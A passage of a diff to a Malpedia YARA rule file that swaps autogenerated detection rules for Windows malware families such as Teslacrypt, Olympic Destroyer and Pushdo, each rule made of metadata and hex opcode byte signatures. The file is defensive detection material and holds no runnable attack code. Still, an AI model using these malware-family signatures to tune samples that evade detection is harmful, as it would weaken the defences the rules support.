} - $sequence_3 = { 8939 488d4c2430 41b89c000000 e8???????? 488d4c2430 } - $sequence_4 = { 74df 8d047506000000 50 6a40 ff15???????? 8bc8 894d0c } - $sequence_5 = { 85c0 751d 837c247001 7516 395c2478 7610 488b4c2430 } - $sequence_6 = { 4885db 7417 0fb7445ffe 6683f85c 7406 6683f82f } - $sequence_7 = { 498bce 33f6 e8???????? 85ed } - $sequence_8 = { 498bce 4489bc2488000000 453bc4 4c897c2420 } - $sequence_9 = { 56 6a00 6a00 68???????? ff75f8 ff15???????? 85c0 } - $sequence_10 = { ff15???????? 8d4336 50 6a40 ff15???????? 8bf8 } - $sequence_11 = { 8bf8 897dd4 85ff 7498 837df800 b9???????? 8b5dfc } - $sequence_12 = { ff15???????? 488bd8 4885c0 7512 ff15???????? 488d0d503e0000 } - $sequence_13 = { 8bf8 e9???????? 33c0 40 e9???????? ff15???????? } - $sequence_14 = { 83feff 743b 8b4d0c ff7510 894df4 ff15???????? 668945f2 } - $sequence_15 = { 85c0 0f84bb010000 66833d????????00 0f84ad010000 } + $sequence_0 = { 0fb78d82feffff 2bc8 899570ffffff 014d84 } + $sequence_1 = { 02c1 c645c5ae 8845c3 b937030000 888556ffffff 8a45c7 c6852fffffff00 } + $sequence_2 = { 8bd8 899d88fdffff 85db 0f8483040000 8a0b 80f9e9 7409 } + $sequence_3 = { c83dad3c d92b e00c 9c 0d05f0657b 4e f30f7e05???????? } + $sequence_4 = { 7f06 81c4ab000000 83c410 e8???????? 66f1 } + $sequence_5 = { a1???????? 8945bc a1???????? 0f11855cffffff 894594 f30f7e05???????? 8b45f8 } + $sequence_6 = { 91 ae 54 ce 3106 f77cf30f 7e05 } + $sequence_7 = { 8955f4 8b460c 83ec08 8d0488 8945f8 8d45f4 } + $sequence_8 = { 898d48fdffff 66898562fdffff 668985e6fcffff 66398d30fdffff 7634 66ff857cfcffff 8d0432 } + $sequence_9 = { 88852effffff 8b8548ffffff fec8 8855ad 88854dffffff 8d45e8 6689bd0cfeffff } condition: - 7 of them and filesize <123904 + 7 of them and filesize <389120 } -rule MALPEDIA_Win_Ariabody_Auto : FILE +rule MALPEDIA_Win_Aytoke_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "58204a37-6e57-54ad-a9ad-f1e207420b64" + id = "f1478c56-9c46-5623-bd25-6c48e27a19e0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ariabody" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ariabody_auto.yar#L1-L175" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aytoke" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.aytoke_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "eeda1b828c38fb501f5c05c0fadc1525e86a5abb54edde2f591e92fd62c5dd82" + logic_hash = "7de9f368c79cc6db2fb2092fd19a4e0bd2fcaaf4a3ec4500b832560e5022850b" score = 75 quality = 75 tags = "FILE" @@ -163111,40 +165902,34 @@ rule MALPEDIA_Win_Ariabody_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { eb13 8b16 8bcf e8???????? 8906 85c0 } - $sequence_1 = { 8bcf 0fb6c0 50 ff75fc e8???????? } - $sequence_2 = { 7402 32c3 88040a 41 } - $sequence_3 = { 8a01 84c0 7406 3ac3 7402 } - $sequence_4 = { 56 8d0c30 ffd1 8bc6 5f } - $sequence_5 = { 8bf2 56 8d55fc 03f9 e8???????? 59 85c0 } - $sequence_6 = { 83ec50 53 57 8bd9 e8???????? 8bf8 893b } - $sequence_7 = { ff5304 8bf8 893e eb13 8b16 8bcf } - $sequence_8 = { 33d2 488d8c2498000000 41b800010000 41ffc7 ff9510020000 } - $sequence_9 = { 48895c2408 57 4883ec20 4863d9 488d3da4d30000 4803db 48833cdf00 } - $sequence_10 = { eb17 83f802 7512 488d4c2430 488d942420060000 e8???????? } - $sequence_11 = { 33ff 488d0480 418b4cc60c 418b54c614 4903cc 458b44c610 4803d3 } - $sequence_12 = { e8???????? 3d5595db6d 741d 4d8b7f18 } - $sequence_13 = { 41b820000000 488d942444010000 4c8d8c2468010000 48c7402000000000 41ff96d0000000 85c0 7429 } - $sequence_14 = { 4c89e1 4533c9 8b942464010000 41ff96c0000000 4889e0 4c89e1 41b820000000 } - $sequence_15 = { 8b0b e8???????? 48630b 4c8d2dd59f0000 488bc1 } + $sequence_0 = { 6685c9 75e9 e9???????? 33c0 8bff 0fb788103a4100 66898c05fcfdffff } + $sequence_1 = { 3c58 770f 0fbec2 0fbe80f83b4100 83e00f eb02 33c0 } + $sequence_2 = { 8bd0 83e01f c1fa05 8b149500c44100 59 c1e006 59 } + $sequence_3 = { 56 e8???????? c1f805 56 8d3c8500c44100 e8???????? 83e01f } + $sequence_4 = { 90 68???????? e8???????? a1???????? 46 83c004 } + $sequence_5 = { 2bc2 bb5c000000 85c0 7e16 } + $sequence_6 = { be01000000 83c104 83c408 3bce } + $sequence_7 = { 33c0 8d642400 0fb7888c3a4100 66898c05fcfdffff 83c002 6685c9 75e9 } + $sequence_8 = { 85ff 7424 56 53 6a01 57 } + $sequence_9 = { 663bc1 0f85cc130000 8d95fcfcffff 52 ff15???????? 68a0000000 } condition: - 7 of them and filesize <253952 + 7 of them and filesize <425984 } -rule MALPEDIA_Win_Ghostemperor_Auto : FILE +rule MALPEDIA_Win_Gamotrol_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "22543585-64e5-59d9-a95f-0fb017ff004e" + id = "a4423f00-4d12-5905-ae9f-2ac00b302637" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostemperor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ghostemperor_auto.yar#L1-L228" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gamotrol_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "91e3702f968d398f5f44f42cafec6cc32480eb0e4729b0b5f30643c45ff1a402" + logic_hash = "dbb5086714c8814bb752b80e0051cf0358b1814ba2516480704e9248f4a5718d" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -163156,47 +165941,34 @@ rule MALPEDIA_Win_Ghostemperor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { b801000000 4883c428 5b 5d 5f 5e } - $sequence_1 = { 31d2 41b801000000 4531c9 ff15???????? } - $sequence_2 = { 41c1ea03 4183e007 4585d2 0f84b9000000 } - $sequence_3 = { 8b5b10 4885db 7431 c7471800000000 89d9 } - $sequence_4 = { e8???????? 48c7470800000000 c7471000000000 4c8d7e18 4c89f9 ff15???????? 448b4648 } - $sequence_5 = { 4885c9 740d e8???????? 48c7460800000000 } - $sequence_6 = { 4989c9 4889d0 458d5aff 41f6c203 7427 4489d1 83e103 } - $sequence_7 = { 4883c410 c3 ff25???????? ff25???????? ff25???????? ff25???????? ff25???????? } - $sequence_8 = { 4889c1 4863c6 488d0440 48c1e004 4801c8 eb02 31c0 } - $sequence_9 = { 31f6 31d2 660f1f440000 488b3cf0 49313cf1 } - $sequence_10 = { c74424504900df00 c744245436004d00 c74424586b007100 c744245cf5003400 } - $sequence_11 = { 0f8883020000 33d2 c78594000000f1008500 c78598000000a8003f00 448d630e c7859c000000f7003100 } - $sequence_12 = { 01c1 89ca c1ea1f c1f904 } - $sequence_13 = { 488d4dd0 48895dd8 895de0 4c8bea e8???????? be08020000 8bce } - $sequence_14 = { 00c2 488b8568020000 8854080c 488b85b0020000 } - $sequence_15 = { 00c1 488b8568020000 488b95b0020000 884c100c 488b85b0020000 488b85b0020000 488b85b0020000 } - $sequence_16 = { 85c0 7417 418bce 448bc7 48034e08 488bd5 e8???????? } - $sequence_17 = { 7212 4d8b5a10 4d85db 7409 48895c2448 5b } - $sequence_18 = { 01c3 69cbe8030000 81c130750000 4883ec20 } - $sequence_19 = { 01d1 89ca c1e205 89cb } - $sequence_20 = { 7449 8b5c2448 488bc7 d1eb ffcb } - $sequence_21 = { 48895c2408 57 4883ec20 488d0557540000 488bd9 488901 } - $sequence_22 = { c3 83c8ff ebf5 b801000000 ebee } + $sequence_0 = { 5e c3 6a04 b8???????? e8???????? e8???????? 50 } + $sequence_1 = { ff15???????? 8b4b54 6a04 6800100000 51 56 } + $sequence_2 = { 90 8bec 85f6 41 49 6843700000 83c40a } + $sequence_3 = { 6aff 68???????? 68???????? 6a00 ff15???????? 6a00 53 } + $sequence_4 = { 8be5 90 5d 6803010000 } + $sequence_5 = { 8d9540fbffff 52 68???????? ffd6 33c0 8945ad 8945b1 } + $sequence_6 = { c6854fffffff61 c68550ffffff67 889d51ffffff c68552ffffff56 c68553ffffff69 889d54ffffff } + $sequence_7 = { 0fbec2 0fb680a0ed2e00 83e00f 8b4db8 6bc009 0fb68408c0ed2e00 6a08 } + $sequence_8 = { 8b01 57 ff5004 5f 5e c3 8b442404 } + $sequence_9 = { 49 41 49 90 8be5 90 } condition: - 7 of them and filesize <1115136 + 7 of them and filesize <376832 } -rule MALPEDIA_Win_Rokku_Auto : FILE +rule MALPEDIA_Win_Pushdo_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "75b8aef9-2da5-556e-9635-075190f42681" + id = "ad774ebd-627a-5818-9f5f-1b251e52fd7e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rokku_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pushdo_auto.yar#L1-L208" license_url = "N/A" - logic_hash = "3a863d12b65613db8f002333dfdefeb5bdf603888d10aa587187b07349134f7e" + logic_hash = "daece01a3a8065197470b42fa0923405b1cfbd8c63e62002ad7e9af51850eb51" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -163208,32 +165980,43 @@ rule MALPEDIA_Win_Rokku_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f2805???????? 0f114561 8ac1 028541ffffff 30840d42ffffff } - $sequence_1 = { 8bc1 8b942444000300 0bc2 0f8456020000 6a06 } - $sequence_2 = { 8d141b f7ea 8bf8 8bda 8bc1 f76c2470 03f8 } - $sequence_3 = { 89442438 8b44246c 89442418 8b442468 89442414 8b442464 89442444 } - $sequence_4 = { 8b0e e8???????? 33c9 84c0 0f454d08 890e eb1f } - $sequence_5 = { c706???????? 8365fc00 8b4e04 85c9 740d 8b01 ff5010 } - $sequence_6 = { 13ea f76c2454 896c2420 01442410 8d0436 8b742460 } - $sequence_7 = { 8b7a18 8b5220 337918 335120 23fd 8b4824 23d5 } - $sequence_8 = { 894d10 8b4c2414 0fa4c119 8b4c2468 c1e019 2bf0 8bc7 } - $sequence_9 = { 55 56 57 898c24ac000000 8b02 89442454 8b4204 } + $sequence_0 = { 50 ff15???????? 33d2 b9ffff0000 } + $sequence_1 = { f7f9 33c9 ba88020000 f7e2 0f90c1 } + $sequence_2 = { 8b45fc b10b d3c0 61 } + $sequence_3 = { 81ec18010000 6800010000 6a00 8d85f0feffff } + $sequence_4 = { 736a 8b45fc 0fbe8c05f0feffff 038de8feffff 8b45fc } + $sequence_5 = { 0fbe1410 03ca 81e1ff000000 898de8feffff 8b85e8feffff 8a8c05f0feffff } + $sequence_6 = { c785e8feffff00000000 c745f400000000 c745fc00000000 eb09 8b55fc 83c201 8955fc } + $sequence_7 = { 33d1 8b450c 0345fc 8810 e9???????? } + $sequence_8 = { e8???????? 83c41c 85c0 7503 8975fc } + $sequence_9 = { 53 53 894808 8b4e14 50 } + $sequence_10 = { 53 6a18 ffd6 ffb5f4f7ffff 8d85f4fbffff 50 } + $sequence_11 = { 0fb6c3 6a03 33d2 5f f7f7 } + $sequence_12 = { 8d45ec 50 8d4598 50 57 57 } + $sequence_13 = { 52 8d8588fbffff 50 e8???????? } + $sequence_14 = { a1???????? 6bc00a 057f0a0000 33d2 b9a1190000 f7f1 } + $sequence_15 = { e8???????? 89859cd3ffff 83bd9cd3ffff00 0f8ea0000000 8d8550d3ffff 50 } + $sequence_16 = { 3b4dd8 7f28 8b55e4 3b55d8 0f85cf000000 8b45d8 } + $sequence_17 = { 81bd5cfeffff70170000 0f83e2010000 8b855cfeffff 33d2 b964000000 f7f1 85d2 } + $sequence_18 = { ff55e4 8945c8 eb11 8b4dd4 } + $sequence_19 = { 83c404 c1e002 8945e4 8b4de4 } + $sequence_20 = { 50 8b4dfc 51 e8???????? 85c0 7c3b 8b55f0 } condition: - 7 of them and filesize <548864 + 7 of them and filesize <163840 } -rule MALPEDIA_Win_Heriplor_Auto : FILE +rule MALPEDIA_Win_Roll_Sling_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d711b4d9-3914-58b9-9b88-9214444e3dee" + id = "2ab89f07-526d-5404-82a8-065dc4627e90" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.heriplor_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roll_sling" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.roll_sling_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "bf5971e2bb98e2180b60da71db38d7f4898a68723f2588a48c70334b337b7d93" + logic_hash = "57322c90ec2e7f0f9b25a02d63cfaa81737587c7821fd15face6c16907aace76" score = 75 quality = 75 tags = "FILE" @@ -163247,34 +166030,34 @@ rule MALPEDIA_Win_Heriplor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c20c00 55 89e5 56 57 33c9 648b4130 } - $sequence_1 = { 40 5b 59 89ec } - $sequence_2 = { 8a08 84c9 740d 80c960 01cb c1e301 } - $sequence_3 = { 668b13 8b0491 01f8 5f 5e 89ec 5d } - $sequence_4 = { 89e5 51 53 33db 33c9 8b4508 } - $sequence_5 = { 85ff 7420 46 46 } - $sequence_6 = { 7407 83c204 43 43 ebe6 33d2 668b13 } - $sequence_7 = { 01fb 8b32 01fe 6a01 ff750c } - $sequence_8 = { 3b5d0c 7401 40 5b } - $sequence_9 = { 01f9 01fa 01fb 8b32 01fe 6a01 ff750c } + $sequence_0 = { 33c9 ff15???????? 48898424a8000000 4c8bf8 4885c0 7431 ff15???????? } + $sequence_1 = { 4c8b7dd8 3b5c2440 7306 488b4dd0 ebb9 498bcd } + $sequence_2 = { b80d000000 41bf0a000000 440f44f8 33db 4c03f7 0f1f4000 66660f1f840000000000 } + $sequence_3 = { 488b55d0 4883fa10 0f824effffff 48ffc2 488b4db8 488bc1 4881fa00100000 } + $sequence_4 = { 488905???????? 498bde 4883fa10 480f431d???????? 4803d9 41b823000000 } + $sequence_5 = { 0f86ec000000 eb0a 48b92700000000000080 e8???????? 4885c0 0f84cc000000 488d7827 } + $sequence_6 = { e8???????? 41c6042f00 48893e 488bc6 4c8b6c2460 488b7c2458 } + $sequence_7 = { 41b801010000 e8???????? 418bc6 4d8d4d10 4c8d3d04180100 41be04000000 } + $sequence_8 = { eb14 4889742420 4c8d4da0 488bd6 } + $sequence_9 = { 7476 48895c2438 4533c9 4533c0 48897c2420 bad8070000 } condition: - 7 of them and filesize <49152 + 7 of them and filesize <299008 } -rule MALPEDIA_Win_Kleptoparasite_Stealer_Auto : FILE +rule MALPEDIA_Win_Seasalt_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d0389ad4-24e3-5ce2-885f-8e2d3c44dd15" + id = "e41fdf89-eed2-569c-87d1-66ae3f31eb44" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kleptoparasite_stealer_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.seasalt" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.seasalt_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "1caf749c6c15dea159c6ab2428d269f9b9674545b72666548fcdc2b3e50e89c9" - score = 60 - quality = 35 + logic_hash = "c4e00a9b356da4bb38f74ae93a3974f0cb2a6403defdfa59feac8c8b4bbe886d" + score = 75 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -163286,34 +166069,34 @@ rule MALPEDIA_Win_Kleptoparasite_Stealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7405 8901 895104 8be5 5d c3 3b0d???????? } - $sequence_1 = { ebe4 6a0c 68???????? e8???????? 8365e400 33c0 8b7d08 } - $sequence_2 = { e8???????? cc 55 8bec 56 e8???????? 8b7508 } - $sequence_3 = { 895104 8be5 5d c3 3b0d???????? 7502 } - $sequence_4 = { b8???????? c3 e9???????? 55 8bec 56 e8???????? } - $sequence_5 = { 59 c3 6a10 68???????? e8???????? 33ff 897de0 } - $sequence_6 = { 895104 8be5 5d c3 3b0d???????? } - $sequence_7 = { cc 55 8bec 56 e8???????? 8b7508 6a02 } - $sequence_8 = { 8901 895104 8be5 5d c3 3b0d???????? 7502 } - $sequence_9 = { c3 e9???????? 55 8bec 56 e8???????? 8bf0 } + $sequence_0 = { 888800d90010 eb1f 83f861 7213 } + $sequence_1 = { a3???????? 3bc6 7513 68e0930400 ff15???????? 8975fc } + $sequence_2 = { 83d8ff 3bc3 758c b901040000 33c0 } + $sequence_3 = { f2ae a1???????? 68???????? f7d1 } + $sequence_4 = { 8b8c2454010000 6a00 8d442428 6800010000 50 } + $sequence_5 = { 6aff 50 ff15???????? 85c0 6a00 } + $sequence_6 = { 8bf7 c1e902 8bfa 8d942488010000 f3a5 } + $sequence_7 = { 7ced 55 8bac2418020000 6a00 8d442414 6804020000 50 } + $sequence_8 = { 8dbc2419020000 c684241802000000 f3ab 66ab 6a00 } + $sequence_9 = { c1e902 83e203 83f908 7229 f3a5 ff2495c8350010 8bc7 } condition: - 7 of them and filesize <3006464 + 7 of them and filesize <139264 } -rule MALPEDIA_Win_Atharvan_Auto : FILE +rule MALPEDIA_Win_Olympic_Destroyer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "90143155-ec04-5a1a-8f1d-cad8e690d20c" + id = "9f025408-c0a3-516e-ac3a-efc2033f9b9b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atharvan" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.atharvan_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.olympic_destroyer_auto.yar#L1-L222" license_url = "N/A" - logic_hash = "4ab12aee6394d0021e81333c85382f01af297ccebc032a8d7f39b0ec61d7b92e" + logic_hash = "93564b4c61bfe578140a2ed1dd33860e59e2d49295b03d310dd7eaa077d799f2" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -163325,32 +166108,45 @@ rule MALPEDIA_Win_Atharvan_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4c8d05ee7a0000 488b9540070000 488bce e8???????? 85c0 750b eb9e } - $sequence_1 = { 423a9401d4ab0100 7566 488b03 48ffc1 8a10 48ffc0 488903 } - $sequence_2 = { 498784f6105c0200 4885c0 7409 488bcb ff15???????? 4885db } - $sequence_3 = { 8d0480 03c0 442be8 0f84cffbffff 418d45ff 8b848228aa0100 } - $sequence_4 = { 750d 4c8bc6 e8???????? e9???????? 4c8bce 4c8d05e1dd0100 } - $sequence_5 = { 498bcf ff15???????? 498bcf ff15???????? 488b4c2440 4833cc e8???????? } - $sequence_6 = { b903000000 4c8d0564a10000 488d1565a10000 e8???????? } - $sequence_7 = { 498bcf ff15???????? 488bd8 eb02 33db 4c8d3d028cffff 4885db } - $sequence_8 = { 7528 48833d????????00 741e 488d0d943e0100 e8???????? 85c0 } - $sequence_9 = { 83f801 751f 488b0d???????? 488d1d356c0100 483bcb 740c } + $sequence_0 = { 56 33c0 89542414 57 } + $sequence_1 = { 6690 3939 770a 8bc1 46 } + $sequence_2 = { 8b0c8d60ee5500 80643128fd 5f 5e } + $sequence_3 = { 50 689b000000 e8???????? e9???????? } + $sequence_4 = { ff15???????? 6880ee3600 ff15???????? 6800000500 56 } + $sequence_5 = { 50 68???????? e8???????? 83c408 8907 85c0 0f8480000000 } + $sequence_6 = { a1???????? 85c0 741a 833d????????00 7c0a } + $sequence_7 = { 50 68???????? 8d85e4fcffff 6805010000 } + $sequence_8 = { a1???????? c705????????f3274000 8935???????? a3???????? ff15???????? a3???????? 83f8ff } + $sequence_9 = { 7678 eb06 8b8de8efffff 2b8df0efffff 1b85f4efffff } + $sequence_10 = { 2bfa 8d0450 57 50 } + $sequence_11 = { 750b ff15???????? e9???????? 8b3d???????? 6a02 56 } + $sequence_12 = { 83f8fe 7419 8a4a02 3a4e02 } + $sequence_13 = { 83ffff 743a 8d857cf9ffff 50 57 ff15???????? } + $sequence_14 = { 898588f9ffff 8d85e4fbffff 68???????? 50 ff15???????? 83c40c 8d8594f9ffff } + $sequence_15 = { 8d842494000000 89442424 8d54241c 8b44245c 8d4c2424 6a24 } + $sequence_16 = { 50 68???????? 8bd7 8bcb e8???????? 8bd8 } + $sequence_17 = { 8d8580f7ffff 50 56 56 56 56 } + $sequence_18 = { 89442418 85c0 743a 57 } + $sequence_19 = { 50 68???????? 8d85ecfdffff 6805010000 } + $sequence_20 = { ffd6 50 ff15???????? 8d8594f9ffff } + $sequence_21 = { 50 68???????? e8???????? 83c40c 8903 5f } + $sequence_22 = { 50 68???????? 8901 ff770c e8???????? 83c40c } condition: - 7 of them and filesize <348160 + 7 of them and filesize <1392640 } -rule MALPEDIA_Win_Divergent_Auto : FILE +rule MALPEDIA_Win_Poldat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "14cdfb94-4b91-530e-a0fa-873505b81024" + id = "a4b71e9b-caa3-5e09-abcb-8fc111c1e88a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.divergent" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.divergent_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poldat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.poldat_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "60d51f83c6b67d5042579114a766b27aab37221121fff155d69e0a695b8fbbca" + logic_hash = "eec21397be824c40480269ad179cee66cff4f29ddc631fb679aa6de7be434481" score = 75 quality = 75 tags = "FILE" @@ -163364,32 +166160,32 @@ rule MALPEDIA_Win_Divergent_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bc1 880438 40 3d00010000 7cf5 8b450c } - $sequence_1 = { 83c418 85db 0f8537ffffff 5f 5e 68???????? ff15???????? } - $sequence_2 = { 3b4510 7518 ff7510 8b4704 ff750c } - $sequence_3 = { 85c0 750a 830604 5e 5d e9???????? 33c0 } - $sequence_4 = { ff15???????? 837e0800 7412 ff7608 ff15???????? ff7608 e8???????? } - $sequence_5 = { 3bf1 7421 3bf9 741d 3bc1 7419 c1e204 } - $sequence_6 = { 85db 0f84da000000 3975f4 0f84d1000000 53 e8???????? 8945e4 } - $sequence_7 = { 5d c3 ff25???????? 55 8bec 837d0800 741f } - $sequence_8 = { e8???????? 8bf8 83c414 85ff 742c 8b463c ff743054 } - $sequence_9 = { 0fb6f1 0fb6ca 0fb60406 034510 03c8 81e1ff000080 7908 } + $sequence_0 = { 8b35???????? 6a08 66ab 58 } + $sequence_1 = { 57 6a05 6a00 68???????? } + $sequence_2 = { 50 e8???????? 68fe010000 8d86b8070000 57 } + $sequence_3 = { 8a50ff 881431 41 48 3d???????? 7ff1 8d45fc } + $sequence_4 = { 8b0c9d68c34100 8b5e04 23ca 03cb 33db 8a1cce 8d34ce } + $sequence_5 = { 50 ff15???????? 56 e8???????? 59 5f 5e } + $sequence_6 = { 8b4c241c 8b0c8d68c34100 23cf 03c1 8b4c241c d3ef 03ca } + $sequence_7 = { 750a c74720a0324000 895728 395724 7507 } + $sequence_8 = { 7233 e9???????? 8b4c243c 8b5c2410 8b7104 c7411824d84100 } + $sequence_9 = { f7f9 8bfa ffd6 50 } condition: - 7 of them and filesize <212992 + 7 of them and filesize <247808 } -rule MALPEDIA_Win_Thanatos_Ransom_Auto : FILE +rule MALPEDIA_Win_Artfulpie_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fa527852-1102-5288-af99-f970a4826a1e" + id = "76593040-a588-559b-a14b-1edef48802a1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.thanatos_ransom_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.artfulpie" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.artfulpie_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "9c5c5f690fb079c4870ec7aa84eb31a9ced013d63674be92b3d66d32a913f4ab" + logic_hash = "61512abd96fd629a35a0b2673ca4f2027db7aa6e8bcee3bfbea21b9b36b003b2" score = 75 quality = 75 tags = "FILE" @@ -163403,32 +166199,32 @@ rule MALPEDIA_Win_Thanatos_Ransom_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 ff75e0 e8???????? 8b4df8 8bc7 5f 33cd } - $sequence_1 = { 8b00 8bc8 e8???????? c645fc0a } - $sequence_2 = { 50 e8???????? 56 8bd0 c645fc04 } - $sequence_3 = { 83c404 c60300 ff15???????? 50 e8???????? be14000000 } - $sequence_4 = { c745500f000000 c7454c00000000 c6453c00 83f810 7242 8b4d54 } - $sequence_5 = { 88441de8 43 8975e0 83fb04 757c 33f6 8a4435e8 } - $sequence_6 = { 8b0c85e0774300 8a06 46 8844392c 2bf2 eb14 } - $sequence_7 = { 0f8580000000 8b4508 dd00 ebc6 c745e0a0bd4200 e9???????? } - $sequence_8 = { 40 8d4de0 50 ff75e0 e8???????? 8b4df8 } - $sequence_9 = { e8???????? c70021000000 e9???????? 894ddc c745e034bf4200 e9???????? c745e030bf4200 } + $sequence_0 = { 894ddc c745e0a8204100 e9???????? c745e0a4204100 } + $sequence_1 = { 8d1c8568524100 8b03 8b15???????? 83cfff 8bca 8bf2 } + $sequence_2 = { 23c1 83c008 5d c3 8b04c544ec4000 5d } + $sequence_3 = { 7514 8b7830 8b00 397838 740a 33d2 } + $sequence_4 = { 6a00 8d854cfcffff c745fc2a2f2a00 50 } + $sequence_5 = { 660f282d???????? 660f59f5 660f28aa101f4100 660f54e5 660f58fe 660f58fc 660f59c8 } + $sequence_6 = { e8???????? 85c0 7432 8bcb e8???????? } + $sequence_7 = { 8b5d10 8b0485984e4100 56 8b7508 57 8b4c0818 } + $sequence_8 = { 50 53 ff15???????? 85c0 7455 8b7df0 } + $sequence_9 = { 6a41 5f 894df0 8b34cdf00e4100 8b4d08 6a5a } condition: - 7 of them and filesize <516096 + 7 of them and filesize <204800 } -rule MALPEDIA_Win_Teslacrypt_Auto : FILE +rule MALPEDIA_Win_Wastedloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cf4cf463-c704-58da-bdf6-218fd6a96530" + id = "f15153cb-6336-5eec-a420-db8a6857e34a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.teslacrypt_auto.yar#L1-L177" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wastedloader_auto.yar#L1-L120" license_url = "N/A" - logic_hash = 